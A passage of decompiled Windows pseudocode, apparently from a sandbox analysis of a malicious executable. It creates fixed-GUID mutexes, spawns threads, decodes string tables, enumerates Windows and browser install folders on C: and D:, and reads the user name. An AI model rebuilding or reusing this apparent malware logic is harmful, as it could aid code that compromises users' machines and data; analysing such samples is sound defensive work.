                                                                                                    								_t1264 = _t1264 + 4;
                                                                                                    							}
                                                                                                    							_a44 = 0;
                                                                                                    							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
                                                                                                    							_a28 = _t566;
                                                                                                    							lstrcpyW( &_a3252,  *_t566);
                                                                                                    							_t1201 = 1;
                                                                                                    							__eflags = _a36 - 1;
                                                                                                    							if(_a36 <= 1) {
                                                                                                    								L26:
                                                                                                    								GlobalFree(_a28);
                                                                                                    								__eflags =  *0x513235;
                                                                                                    								if( *0x513235 == 0) {
                                                                                                    									_t570 = E00412220(); // executed
                                                                                                    									__eflags = _t570 - 1;
                                                                                                    								} else {
                                                                                                    									__eflags = E00412220() - 2;
                                                                                                    								}
                                                                                                    								if(__eflags <= 0) {
                                                                                                    									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa); // executed
                                                                                                    									_t949 = _v12;
                                                                                                    									_t1266 = _t1264 + 4;
                                                                                                    									_a148 = 0xf;
                                                                                                    									_t1202 = 0;
                                                                                                    									__eflags = 0;
                                                                                                    									_a144 = 0;
                                                                                                    									_a128 = 0;
                                                                                                    									do {
                                                                                                    										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
                                                                                                    										__eflags =  *_t1164;
                                                                                                    										if( *_t1164 != 0) {
                                                                                                    											_t982 = _t1164;
                                                                                                    											_v12 = _t982 + 1;
                                                                                                    											do {
                                                                                                    												_t573 =  *_t982;
                                                                                                    												_t982 = _t982 + 1;
                                                                                                    												__eflags = _t573;
                                                                                                    											} while (_t573 != 0);
                                                                                                    											_t983 = _t982 - _v12;
                                                                                                    											__eflags = _t983;
                                                                                                    										} else {
                                                                                                    											_t983 = 0;
                                                                                                    										}
                                                                                                    										_push(_t983);
                                                                                                    										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
                                                                                                    										_t1202 = _t1202 + 1;
                                                                                                    										__eflags = _t1202 - 0xa;
                                                                                                    									} while (_t1202 < 0xa);
                                                                                                    									__eflags = _a144 - 0x10;
                                                                                                    									_t576 =  >=  ? _a124 :  &_a124;
                                                                                                    									_push( >=  ? _a124 :  &_a124);
                                                                                                    									 *(_t1230 + 0x8cc) = E00423C24();
                                                                                                    									_a220 = 7;
                                                                                                    									_a200 = 0;
                                                                                                    									_a288 = 0;
                                                                                                    									_a272.hwnd = 0;
                                                                                                    									_a216 = 0;
                                                                                                    									_a292 = 7;
                                                                                                    									E00411CD0(_t949,  &_a272,  &_a200); // executed
                                                                                                    									_t581 = _a16;
                                                                                                    									_t1268 = _t1266 + 8;
                                                                                                    									_t950 = _a28;
                                                                                                    									__eflags = _t581;
                                                                                                    									if(_t581 != 0) {
                                                                                                    										L59:
                                                                                                    										 *(_t1230 + 0x8cc) = 0;
                                                                                                    									} else {
                                                                                                    										__eflags = _t950;
                                                                                                    										if(_t950 != 0) {
                                                                                                    											goto L59;
                                                                                                    										} else {
                                                                                                    											_a12 = 7;
                                                                                                    											_push(0xffffffff);
                                                                                                    											_v8 = 0;
                                                                                                    											_a8 = 0;
                                                                                                    											E00414690(_t950,  &_v8,  &_a200, 0);
                                                                                                    											_t1294 = _t1268 - 0x18;
                                                                                                    											_t1142 = _t1294;
                                                                                                    											_push(0xffffffff);
                                                                                                    											 *(_t1142 + 0x14) = 7;
                                                                                                    											 *(_t1142 + 0x10) = 0;
                                                                                                    											 *_t1142 = 0;
                                                                                                    											E00414690(_t950, _t1142,  &_v20, 0);
                                                                                                    											E0040D240( *(_t1230 + 0x8cc)); // executed
                                                                                                    											_t1268 = _t1294 + 0x18;
                                                                                                    											__eflags = _v12 - 8;
                                                                                                    											if(_v12 >= 8) {
                                                                                                    												L00422587(_v16);
                                                                                                    												_t1268 = _t1268 + 4;
                                                                                                    											}
                                                                                                    											_t581 = _a8;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									__eflags =  *0x513235;
                                                                                                    									if( *0x513235 != 0) {
                                                                                                    										L60:
                                                                                                    										E00411A10();
                                                                                                    										goto L61;
                                                                                                    									} else {
                                                                                                    										__eflags = _t581;
                                                                                                    										if(_t581 != 0) {
                                                                                                    											L62:
                                                                                                    											__eflags =  *0x513234;
                                                                                                    											if(__eflags != 0) {
                                                                                                    												goto L81;
                                                                                                    											} else {
                                                                                                    												__eflags = _t581;
                                                                                                    												if(__eflags == 0) {
                                                                                                    													__eflags = _t950;
                                                                                                    													if(__eflags == 0) {
                                                                                                    														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
                                                                                                    														_t1245 = _v16;
                                                                                                    														_t1268 = _t1268 + 4;
                                                                                                    														_a108 = 0xf;
                                                                                                    														_t1217 = 0;
                                                                                                    														__eflags = 0;
                                                                                                    														_a104.hwnd = 0;
                                                                                                    														_a88 = _t950;
                                                                                                    														do {
                                                                                                    															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
                                                                                                    															__eflags =  *_t1191;
                                                                                                    															if( *_t1191 != 0) {
                                                                                                    																_t1136 = _t1191;
                                                                                                    																_t950 = _t1136 + 1;
                                                                                                    																do {
                                                                                                    																	_t859 =  *_t1136;
                                                                                                    																	_t1136 = _t1136 + 1;
                                                                                                    																	__eflags = _t859;
                                                                                                    																} while (_t859 != 0);
                                                                                                    																_t1137 = _t1136 - _t950;
                                                                                                    																__eflags = _t1137;
                                                                                                    															} else {
                                                                                                    																_t1137 = 0;
                                                                                                    															}
                                                                                                    															_push(_t1137);
                                                                                                    															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
                                                                                                    															_t1217 = _t1217 + 1;
                                                                                                    															__eflags = _t1217 - 0x10;
                                                                                                    														} while (_t1217 < 0x10);
                                                                                                    														_t861 =  &_a84;
                                                                                                    														_t1140 =  &(_v24[0x8d0]);
                                                                                                    														__eflags =  &(_v24[0x8d0]) - _t861;
                                                                                                    														if( &(_v24[0x8d0]) != _t861) {
                                                                                                    															_push(0xffffffff);
                                                                                                    															E00413FF0(_t950, _t1140, _t861, 0);
                                                                                                    														}
                                                                                                    														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258);
                                                                                                    														__eflags = _a100 - 0x10;
                                                                                                    														 *0x513254 = _t865;
                                                                                                    														if(__eflags >= 0) {
                                                                                                    															L00422587(_a80);
                                                                                                    															_t1268 = _t1268 + 4;
                                                                                                    														}
                                                                                                    													}
                                                                                                    												}
                                                                                                    												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
                                                                                                    												_t1292 = _t1268 + 4;
                                                                                                    												_t1244 = 0;
                                                                                                    												__eflags = 0;
                                                                                                    												do {
                                                                                                    													_t846 = _v16;
                                                                                                    													_a20 =  *(_t846 + _t1244 * 4);
                                                                                                    													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
                                                                                                    													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
                                                                                                    													E0042B420(_t950, 0, _t1215);
                                                                                                    													_t1292 = _t1292 + 0x10;
                                                                                                    													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
                                                                                                    													lstrcatW(0x513290, _t950);
                                                                                                    													_t1244 = _t1244 + 1;
                                                                                                    													__eflags = _t1244 - 0xa;
                                                                                                    												} while (_t1244 < 0xa);
                                                                                                    												__eflags = lstrlenW(0x51a7c0);
                                                                                                    												if(__eflags <= 0) {
                                                                                                    													E0040E760(0x513278, __eflags);
                                                                                                    													 *0x529225 = _a16;
                                                                                                    													 *0x529226 = _a28;
                                                                                                    													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c);
                                                                                                    													 *0x513260 = _t856;
                                                                                                    													WaitForSingleObject(_t856, 0xffffffff);
                                                                                                    												}
                                                                                                    												 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
                                                                                                    											}
                                                                                                    											goto L82;
                                                                                                    										} else {
                                                                                                    											__eflags = _t950;
                                                                                                    											if(_t950 != 0) {
                                                                                                    												goto L62;
                                                                                                    											} else {
                                                                                                    												__eflags =  *0x513234 - _t950;
                                                                                                    												if(__eflags != 0) {
                                                                                                    													L81:
                                                                                                    													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
                                                                                                    													L82:
                                                                                                    													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
                                                                                                    													_t1231 = _v16;
                                                                                                    													_t1269 = _t1268 + 4;
                                                                                                    													_a340 = 0xf;
                                                                                                    													_t1204 = 0;
                                                                                                    													__eflags = 0;
                                                                                                    													_a336 = 0;
                                                                                                    													_a320 = 0;
                                                                                                    													do {
                                                                                                    														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
                                                                                                    														__eflags =  *_t1167;
                                                                                                    														if( *_t1167 != 0) {
                                                                                                    															_t986 = _t1167;
                                                                                                    															_t950 = _t986 + 1;
                                                                                                    															do {
                                                                                                    																_t585 =  *_t986;
                                                                                                    																_t986 = _t986 + 1;
                                                                                                    																__eflags = _t585;
                                                                                                    															} while (_t585 != 0);
                                                                                                    															_t987 = _t986 - _t950;
                                                                                                    															__eflags = _t987;
                                                                                                    														} else {
                                                                                                    															_t987 = 0;
                                                                                                    														}
                                                                                                    														_push(_t987);
                                                                                                    														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
                                                                                                    														_t1204 = _t1204 + 1;
                                                                                                    														__eflags = _t1204 - 0xa;
                                                                                                    													} while (_t1204 < 0xa);
                                                                                                    													_t1270 = _t1269 - 0x18;
                                                                                                    													_v20 = 0;
                                                                                                    													_t1168 = _t1270;
                                                                                                    													_t1205 =  &_v20;
                                                                                                    													 *(_t1168 + 0x14) = 7;
                                                                                                    													 *(_t1168 + 0x10) = 0;
                                                                                                    													 *_t1168 = 0;
                                                                                                    													__eflags =  *0x51a7c0;
                                                                                                    													if( *0x51a7c0 != 0) {
                                                                                                    														_t989 = 0x51a7c0;
                                                                                                    														_t201 =  &(_t989[1]); // 0x51a7c2
                                                                                                    														_t1231 = _t201;
                                                                                                    														do {
                                                                                                    															_t588 =  *_t989;
                                                                                                    															_t989 =  &(_t989[1]);
                                                                                                    															__eflags = _t588;
                                                                                                    														} while (_t588 != 0);
                                                                                                    														_t990 = _t989 - _t1231;
                                                                                                    														__eflags = _t990;
                                                                                                    														_t991 = _t990 >> 1;
                                                                                                    													} else {
                                                                                                    														_t991 = 0;
                                                                                                    													}
                                                                                                    													_push(_t991);
                                                                                                    													E00415C10(0, _t1168, _t1205, _t1231, 0x51a7c0);
                                                                                                    													_t590 = E00412840( &_v20, 0);
                                                                                                    													_t1271 = _t1270 + 0x18;
                                                                                                    													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
                                                                                                    													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
                                                                                                    														_t590 =  *_t590;
                                                                                                    													}
                                                                                                    													E00410FC0(_t590, _t1205);
                                                                                                    													__eflags = _a4 - 0x10;
                                                                                                    													_t1232 = _v28;
                                                                                                    													if(_a4 >= 0x10) {
                                                                                                    														L00422587(_v16);
                                                                                                    														_t1271 = _t1271 + 4;
                                                                                                    													}
                                                                                                    													_t592 = lstrlenA(_v24);
                                                                                                    													__eflags = _t592 - 0x20;
                                                                                                    													if(_t592 == 0x20) {
                                                                                                    														_t1272 = _t1271 - 0x18;
                                                                                                    														_t1171 = _t1272;
                                                                                                    														_t952 = 0;
                                                                                                    														 *(_t1171 + 0x14) = 7;
                                                                                                    														 *(_t1171 + 0x10) = 0;
                                                                                                    														 *_t1171 = 0;
                                                                                                    														__eflags =  *0x51a7c0;
                                                                                                    														if( *0x51a7c0 != 0) {
                                                                                                    															_t995 = 0x51a7c0;
                                                                                                    															_t210 =  &(_t995[1]); // 0x51a7c2
                                                                                                    															_t1205 = _t210;
                                                                                                    															do {
                                                                                                    																_t594 =  *_t995;
                                                                                                    																_t995 =  &(_t995[1]);
                                                                                                    																__eflags = _t594;
                                                                                                    															} while (_t594 != 0);
                                                                                                    															_t996 = _t995 - _t1205;
                                                                                                    															__eflags = _t996;
                                                                                                    															_t997 = _t996 >> 1;
                                                                                                    														} else {
                                                                                                    															_t997 = 0;
                                                                                                    														}
                                                                                                    														_push(_t997);
                                                                                                    														E00415C10(_t952, _t1171, _t1205, _t1232, 0x51a7c0);
                                                                                                    														_t596 = E00412840( &_v24, _t952);
                                                                                                    														_t1273 = _t1272 + 0x18;
                                                                                                    														__eflags = _t596[0x14] - 0x10;
                                                                                                    														if(_t596[0x14] >= 0x10) {
                                                                                                    															_t596 =  *_t596;
                                                                                                    														}
                                                                                                    														lstrcpyA(_t1232 + 0x28, _t596);
                                                                                                    														__eflags = _v0 - 0x10;
                                                                                                    														if(_v0 >= 0x10) {
                                                                                                    															L00422587(_v20);
                                                                                                    															_t1273 = _t1273 + 4;
                                                                                                    														}
                                                                                                    														__eflags =  *0x521cf0;
                                                                                                    														if( *0x521cf0 != 0) {
                                                                                                    															_t1000 = 0x521cf0;
                                                                                                    															_t216 =  &(_t1000[1]); // 0x521cf2
                                                                                                    															_t1173 = _t216;
                                                                                                    															do {
                                                                                                    																_t599 =  *_t1000;
                                                                                                    																_t1000 =  &(_t1000[1]);
                                                                                                    																__eflags = _t599;
                                                                                                    															} while (_t599 != 0);
                                                                                                    															_t1001 = _t1000 - _t1173;
                                                                                                    															__eflags = _t1001;
                                                                                                    															_t1002 = _t1001 >> 1;
                                                                                                    														} else {
                                                                                                    															_t1002 = 0;
                                                                                                    														}
                                                                                                    														_push(_t1002);
                                                                                                    														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
                                                                                                    														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
                                                                                                    														_t1233 = _v36;
                                                                                                    														_t1274 = _t1273 + 4;
                                                                                                    														_a248 = 0xf;
                                                                                                    														_t1206 = 0;
                                                                                                    														__eflags = 0;
                                                                                                    														_a244 = 0;
                                                                                                    														_a228 = 0;
                                                                                                    														do {
                                                                                                    															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
                                                                                                    															__eflags =  *_t1175;
                                                                                                    															if( *_t1175 != 0) {
                                                                                                    																_t1005 = _t1175;
                                                                                                    																_t952 = _t1005 + 1;
                                                                                                    																do {
                                                                                                    																	_t602 =  *_t1005;
                                                                                                    																	_t1005 = _t1005 + 1;
                                                                                                    																	__eflags = _t602;
                                                                                                    																} while (_t602 != 0);
                                                                                                    																_t1006 = _t1005 - _t952;
                                                                                                    																__eflags = _t1006;
                                                                                                    															} else {
                                                                                                    																_t1006 = 0;
                                                                                                    															}
                                                                                                    															_push(_t1006);
                                                                                                    															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
                                                                                                    															_t1206 = _t1206 + 1;
                                                                                                    															__eflags = _t1206 - 0xa;
                                                                                                    														} while (_t1206 < 0xa);
                                                                                                    														_t1275 = _t1274 - 0x18;
                                                                                                    														_t1008 = _t1275;
                                                                                                    														_push(0xffffffff);
                                                                                                    														 *(_t1008 + 0x14) = 0xf;
                                                                                                    														 *(_t1008 + 0x10) = 0;
                                                                                                    														 *_t1008 = 0;
                                                                                                    														E00413FF0(0, _t1008,  &_a228, 0);
                                                                                                    														_t1207 = E00412900( &_v40, 0);
                                                                                                    														_t955 = _v52 + 0x828;
                                                                                                    														_t1276 = _t1275 + 0x18;
                                                                                                    														__eflags = _t955 - _t1207;
                                                                                                    														if(_t955 != _t1207) {
                                                                                                    															__eflags = _t955[5] - 8;
                                                                                                    															if(_t955[5] >= 8) {
                                                                                                    																L00422587( *_t955);
                                                                                                    																_t1276 = _t1276 + 4;
                                                                                                    															}
                                                                                                    															_t955[5] = 7;
                                                                                                    															_t955[4] = 0;
                                                                                                    															 *_t955 = 0;
                                                                                                    															__eflags = _t1207[5] - 8;
                                                                                                    															if(_t1207[5] >= 8) {
                                                                                                    																 *_t955 =  *_t1207;
                                                                                                    																 *_t1207 = 0;
                                                                                                    															} else {
                                                                                                    																_t839 = _t1207[4] + 1;
                                                                                                    																__eflags = _t839;
                                                                                                    																if(_t839 != 0) {
                                                                                                    																	E004205A0(_t955, _t1207, _t839 + _t839);
                                                                                                    																	_t1276 = _t1276 + 0xc;
                                                                                                    																}
                                                                                                    															}
                                                                                                    															_t955[4] = _t1207[4];
                                                                                                    															_t955[5] = _t1207[5];
                                                                                                    															__eflags = 0;
                                                                                                    															_t1207[5] = 7;
                                                                                                    															_t1207[4] = 0;
                                                                                                    															 *_t1207 = 0;
                                                                                                    														}
                                                                                                    														__eflags = _v12 - 8;
                                                                                                    														if(__eflags >= 0) {
                                                                                                    															L00422587(_v32);
                                                                                                    															_t1276 = _t1276 + 4;
                                                                                                    														}
                                                                                                    														E0040EF50(0x50fef0,  &_v40, __eflags, 0xa);
                                                                                                    														_t1234 = _v40;
                                                                                                    														_t1277 = _t1276 + 4;
                                                                                                    														_a220 = 0xf;
                                                                                                    														_t1208 = 0;
                                                                                                    														__eflags = 0;
                                                                                                    														_a216 = 0;
                                                                                                    														_a200 = 0;
                                                                                                    														do {
                                                                                                    															_t1178 =  *((intOrPtr*)(_t1234 + _t1208 * 4));
                                                                                                    															__eflags =  *_t1178;
                                                                                                    															if( *_t1178 != 0) {
                                                                                                    																_t1011 = _t1178;
                                                                                                    																_t955 = _t1011 + 1;
                                                                                                    																do {
                                                                                                    																	_t608 =  *_t1011;
                                                                                                    																	_t1011 = _t1011 + 1;
                                                                                                    																	__eflags = _t608;
                                                                                                    																} while (_t608 != 0);
                                                                                                    																_t1012 = _t1011 - _t955;
                                                                                                    																__eflags = _t1012;
                                                                                                    															} else {
                                                                                                    																_t1012 = 0;
                                                                                                    															}
                                                                                                    															_push(_t1012);
                                                                                                    															E00413EA0(_t955,  &_a200, _t1208, _t1234, _t1178);
                                                                                                    															_t1208 = _t1208 + 1;
                                                                                                    															__eflags = _t1208 - 0xa;
                                                                                                    														} while (_t1208 < 0xa);
                                                                                                    														_t1278 = _t1277 - 0x18;
                                                                                                    														_t1014 = _t1278;
                                                                                                    														_push(0xffffffff);
                                                                                                    														 *(_t1014 + 0x14) = 0xf;
                                                                                                    														 *(_t1014 + 0x10) = 0;
                                                                                                    														 *_t1014 = 0;
                                                                                                    														E00413FF0(0, _t1014,  &_a196, 0);
                                                                                                    														_t1209 = E00412900( &_v48, 0);
                                                                                                    														_t958 = _v60 + 0x840;
                                                                                                    														_t1279 = _t1278 + 0x18;
                                                                                                    														__eflags = _t958 - _t1209;
                                                                                                    														if(_t958 != _t1209) {
                                                                                                    															__eflags = _t958[5] - 8;
                                                                                                    															if(_t958[5] >= 8) {
                                                                                                    																L00422587( *_t958);
                                                                                                    																_t1279 = _t1279 + 4;
                                                                                                    															}
                                                                                                    															_t958[5] = 7;
                                                                                                    															_t958[4] = 0;
                                                                                                    															 *_t958 = 0;
                                                                                                    															__eflags = _t1209[5] - 8;
                                                                                                    															if(_t1209[5] >= 8) {
                                                                                                    																 *_t958 =  *_t1209;
                                                                                                    																 *_t1209 = 0;
                                                                                                    															} else {
                                                                                                    																_t828 = _t1209[4] + 1;
                                                                                                    																__eflags = _t828;
                                                                                                    																if(_t828 != 0) {
                                                                                                    																	E004205A0(_t958, _t1209, _t828 + _t828);
                                                                                                    																	_t1279 = _t1279 + 0xc;
                                                                                                    																}
                                                                                                    															}
                                                                                                    															_t958[4] = _t1209[4];
                                                                                                    															_t958[5] = _t1209[5];
                                                                                                    															__eflags = 0;
                                                                                                    															_t1209[5] = 7;
                                                                                                    															_t1209[4] = 0;
                                                                                                    															 *_t1209 = 0;
                                                                                                    														}
                                                                                                    														__eflags = _v20 - 8;
                                                                                                    														if(__eflags >= 0) {
                                                                                                    															L00422587(_v40);
                                                                                                    															_t1279 = _t1279 + 4;
                                                                                                    														}
                                                                                                    														E0040EF50(0x50ff20,  &_v48, __eflags, 0xa);
                                                                                                    														_t1235 = _v48;
                                                                                                    														_t1280 = _t1279 + 4;
                                                                                                    														_a284 = 0xf;
                                                                                                    														_t1210 = 0;
                                                                                                    														__eflags = 0;
                                                                                                    														_a280 = 0;
                                                                                                    														_a264 = 0;
                                                                                                    														do {
                                                                                                    															_t1181 =  *((intOrPtr*)(_t1235 + _t1210 * 4));
                                                                                                    															__eflags =  *_t1181;
                                                                                                    															if( *_t1181 != 0) {
                                                                                                    																_t1017 = _t1181;
                                                                                                    																_t958 = _t1017 + 1;
                                                                                                    																do {
                                                                                                    																	_t614 =  *_t1017;
                                                                                                    																	_t1017 = _t1017 + 1;
                                                                                                    																	__eflags = _t614;
                                                                                                    																} while (_t614 != 0);
                                                                                                    																_t1018 = _t1017 - _t958;
                                                                                                    																__eflags = _t1018;
                                                                                                    															} else {
                                                                                                    																_t1018 = 0;
                                                                                                    															}
                                                                                                    															_push(_t1018);
                                                                                                    															E00413EA0(_t958,  &_a264, _t1210, _t1235, _t1181);
                                                                                                    															_t1210 = _t1210 + 1;
                                                                                                    															__eflags = _t1210 - 0xa;
                                                                                                    														} while (_t1210 < 0xa);
                                                                                                    														_t1281 = _t1280 - 0x18;
                                                                                                    														_t1020 = _t1281;
                                                                                                    														_push(0xffffffff);
                                                                                                    														 *(_t1020 + 0x14) = 0xf;
                                                                                                    														 *(_t1020 + 0x10) = 0;
                                                                                                    														 *_t1020 = 0;
                                                                                                    														E00413FF0(0, _t1020,  &_a260, 0);
                                                                                                    														_t618 = E00412900( &_v56, 0);
                                                                                                    														_t1236 = _v68;
                                                                                                    														_t1211 = _t618;
                                                                                                    														_t1282 = _t1281 + 0x18;
                                                                                                    														_t960 = _t1236 + 0x870;
                                                                                                    														__eflags = _t960 - _t1211;
                                                                                                    														if(_t960 != _t1211) {
                                                                                                    															__eflags = _t960[5] - 8;
                                                                                                    															if(_t960[5] >= 8) {
                                                                                                    																L00422587( *_t960);
                                                                                                    																_t1282 = _t1282 + 4;
                                                                                                    															}
                                                                                                    															_t960[5] = 7;
                                                                                                    															_t960[4] = 0;
                                                                                                    															 *_t960 = 0;
                                                                                                    															__eflags = _t1211[5] - 8;
                                                                                                    															if(_t1211[5] >= 8) {
                                                                                                    																 *_t960 =  *_t1211;
                                                                                                    																 *_t1211 = 0;
                                                                                                    															} else {
                                                                                                    																_t817 = _t1211[4] + 1;
                                                                                                    																__eflags = _t817;
                                                                                                    																if(_t817 != 0) {
                                                                                                    																	E004205A0(_t960, _t1211, _t817 + _t817);
                                                                                                    																	_t1282 = _t1282 + 0xc;
                                                                                                    																}
                                                                                                    															}
                                                                                                    															_t960[4] = _t1211[4];
                                                                                                    															_t960[5] = _t1211[5];
                                                                                                    															__eflags = 0;
                                                                                                    															_t1211[5] = 7;
                                                                                                    															_t1211[4] = 0;
                                                                                                    															 *_t1211 = 0;
                                                                                                    														}
                                                                                                    														__eflags = _v28 - 8;
                                                                                                    														if(_v28 >= 8) {
                                                                                                    															L00422587(_v48);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														_push(0xb);
                                                                                                    														_v28 = 7;
                                                                                                    														_v32 = 0;
                                                                                                    														_v48 = 0;
                                                                                                    														E00415C10(_t960,  &_v48, _t1211, _t1236, L"C:\\Windows\\");
                                                                                                    														_t1237 = _t1236 + 0x888;
                                                                                                    														E00413580(_t960, _t1236 + 0x888,  &_v56);
                                                                                                    														__eflags = _v40 - 8;
                                                                                                    														if(_v40 >= 8) {
                                                                                                    															L00422587(_v52);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														_push(0x27);
                                                                                                    														_v32 = 7;
                                                                                                    														_v36 = 0;
                                                                                                    														_v52 = 0;
                                                                                                    														E00415C10(_t960,  &_v52, _t1211, _t1237, L"C:\\Program Files (x86)\\Mozilla Firefox\\");
                                                                                                    														E00413580(_t960, _t1237,  &_v60);
                                                                                                    														__eflags = _v44 - 8;
                                                                                                    														if(_v44 >= 8) {
                                                                                                    															L00422587(_v56);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														_push(0x29);
                                                                                                    														_v36 = 7;
                                                                                                    														_v40 = 0;
                                                                                                    														_v56 = 0;
                                                                                                    														E00415C10(_t960,  &_v56, _t1211, _t1237, L"C:\\Program Files (x86)\\Internet Explorer\\");
                                                                                                    														E00413580(_t960, _t1237,  &_v64);
                                                                                                    														__eflags = _v48 - 8;
                                                                                                    														if(_v48 >= 8) {
                                                                                                    															L00422587(_v60);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														_push(0x1e);
                                                                                                    														_v40 = 7;
                                                                                                    														_v44 = 0;
                                                                                                    														_v60 = 0;
                                                                                                    														E00415C10(_t960,  &_v60, _t1211, _t1237, L"C:\\Program Files (x86)\\Google\\");
                                                                                                    														E00413580(_t960, _t1237,  &_v68);
                                                                                                    														__eflags = _v52 - 8;
                                                                                                    														if(_v52 >= 8) {
                                                                                                    															L00422587(_v64);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														_push(0x21);
                                                                                                    														_v44 = 7;
                                                                                                    														_v48 = 0;
                                                                                                    														_v64 = 0;
                                                                                                    														E00415C10(_t960,  &_v64, _t1211, _t1237, L"C:\\Program Files\\Mozilla Firefox\\");
                                                                                                    														E00413580(_t960, _t1237,  &_v72);
                                                                                                    														__eflags = _v56 - 8;
                                                                                                    														if(_v56 >= 8) {
                                                                                                    															L00422587(_v68);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														_push(0x23);
                                                                                                    														_v48 = 7;
                                                                                                    														_v52 = 0;
                                                                                                    														_v68 = 0;
                                                                                                    														E00415C10(_t960,  &_v68, _t1211, _t1237, L"C:\\Program Files\\Internet Explorer\\");
                                                                                                    														E00413580(_t960, _t1237,  &_v76);
                                                                                                    														__eflags = _v60 - 8;
                                                                                                    														if(_v60 >= 8) {
                                                                                                    															L00422587(_v72);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														_push(0x18);
                                                                                                    														_v52 = 7;
                                                                                                    														_v56 = 0;
                                                                                                    														_v72 = 0;
                                                                                                    														E00415C10(_t960,  &_v72, _t1211, _t1237, L"C:\\Program Files\\Google\\");
                                                                                                    														E00413580(_t960, _t1237,  &_v80);
                                                                                                    														__eflags = _v64 - 8;
                                                                                                    														if(_v64 >= 8) {
                                                                                                    															L00422587(_v76);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    														}
                                                                                                    														E00413100( &_v76, _t1211, L"D:\\Windows\\");
                                                                                                    														_v52 = E00415200( &_v36);
                                                                                                    														_t353 = E00415610(_t648) + 0x880; // 0x880
                                                                                                    														E00413580(_t960, _t353,  &_v80);
                                                                                                    														E00413210( &_v84);
                                                                                                    														E00413100( &_v84, _t1211, L"D:\\Program Files (x86)\\Mozilla Firefox\\");
                                                                                                    														_t1212 = E00413920( &_v44);
                                                                                                    														_t358 = _t1212 + 0x880; // 0x880
                                                                                                    														_t961 = _t358;
                                                                                                    														E00413580(_t358, _t358,  &_v88);
                                                                                                    														E00413210( &_v92);
                                                                                                    														E00413100( &_v92, _t1212, L"D:\\Program Files (x86)\\Internet Explorer\\");
                                                                                                    														E00413580(_t961, _t961,  &_v96);
                                                                                                    														E00413210( &_v100);
                                                                                                    														E00413100( &_v100, _t1212, L"D:\\Program Files (x86)\\Google\\");
                                                                                                    														E00413580(_t961, _t961,  &_v104);
                                                                                                    														E00413210( &_v108);
                                                                                                    														E00413100( &_v108, _t1212, L"D:\\Program Files\\Mozilla Firefox\\");
                                                                                                    														E00413580(_t961, _t961,  &_v112);
                                                                                                    														E00413210( &_v116);
                                                                                                    														E00413100( &_v116, _t1212, L"D:\\Program Files\\Internet Explorer\\");
                                                                                                    														E00413580(_t961, _t961,  &_v120);
                                                                                                    														E00413210( &_v124);
                                                                                                    														E00413100( &_v124, _t1212, L"D:\\Program Files\\Google\\");
                                                                                                    														E00413580(_t961, _t961,  &_v128);
                                                                                                    														E00413210( &_v132);
                                                                                                    														_t375 = _t1212 + 0x868; // 0x868
                                                                                                    														_t1238 = _t375;
                                                                                                    														_t677 = E00413490(_t375, 0);
                                                                                                    														__eflags =  *_t677 - 0x2e;
                                                                                                    														if( *_t677 != 0x2e) {
                                                                                                    															_t800 = E0041CDD0( &_v76, _t1238);
                                                                                                    															_t1282 = _t1282 + 4;
                                                                                                    															E004131D0(_t1238, _t800);
                                                                                                    															E00413210( &_v80);
                                                                                                    														}
                                                                                                    														E0041C140(E00413560( &_v76), _t961);
                                                                                                    														E00413600( &_v80);
                                                                                                    														E0040EF50(0x50ff50,  &_v92, __eflags, 0xa);
                                                                                                    														_t1283 = _t1282 + 4;
                                                                                                    														E00412C20( &_a300);
                                                                                                    														_t962 = _v92;
                                                                                                    														_t1239 = 0;
                                                                                                    														do {
                                                                                                    															E00412DE0(_t1212,  *((intOrPtr*)(_t962 + _t1239 * 4)));
                                                                                                    															_t1239 = _t1239 + 1;
                                                                                                    															__eflags = _t1239 - 0xa;
                                                                                                    														} while (_t1239 < 0xa);
                                                                                                    														_v8 = 0x100;
                                                                                                    														GetUserNameW( &_a388,  &_v8);
                                                                                                    														E00413930( &_v76);
                                                                                                    														_t1284 = _t1283 - 0x18;
                                                                                                    														E00412C40(_t1284, _t1212, "|");
                                                                                                    														_t1285 = _t1284 - 0x18;
                                                                                                    														E00412BF0(_t1285,  &_a300);
                                                                                                    														E0040ECB0( &_v84);
                                                                                                    														_t1286 = _t1285 + 0x30;
                                                                                                    														_v100 =  *((intOrPtr*)(E0041C410( &_v84,  &_v96)));
                                                                                                    														_t697 = E0041C450( &_v104, E0041C420( &_v88,  &_v96));
                                                                                                    														__eflags = _t697;
